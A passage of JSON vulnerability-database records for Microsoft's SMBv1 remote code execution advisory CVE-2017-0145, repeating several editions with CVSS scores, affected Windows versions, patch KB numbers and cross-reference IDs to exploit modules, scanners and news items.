1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", 
"kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T10:45:12", "differentElements": ["msAffectedSoftware"], "edition": 26}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-10T18:58:50", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB3205409", "KB4012216", "KB3213986", "KB3212646", "KB4012213", "KB3210720", "KB4013429", "KB4012606", "KB4014077", "KB4012214", "KBMS16-110, 3187754", "KB4012217", "KB4012215", "KB4013198", "KB3177186", "KB3210721", "KB4012598", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": 
"KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems 
Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 
x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T18:58:50", "differentElements": ["msAffectedSoftware"], "edition": 27}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-10T20:44:44", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": 
["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB3205409", "KB4012215", "KB3213986", "KBMS16-110, 3187754", "KB4014077", "KB3210721", "KB4013429", "KB4013198", "KB4012214", "KB3177186", "KB4012213", "KB4012212", "KB3205401", "KB4012598", "KB4012216", "KB3210720", "KB3212646", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": 
"", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", 
"kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T20:44:44", "differentElements": ["msAffectedSoftware"], "edition": 28}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-11T08:48:00", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", 
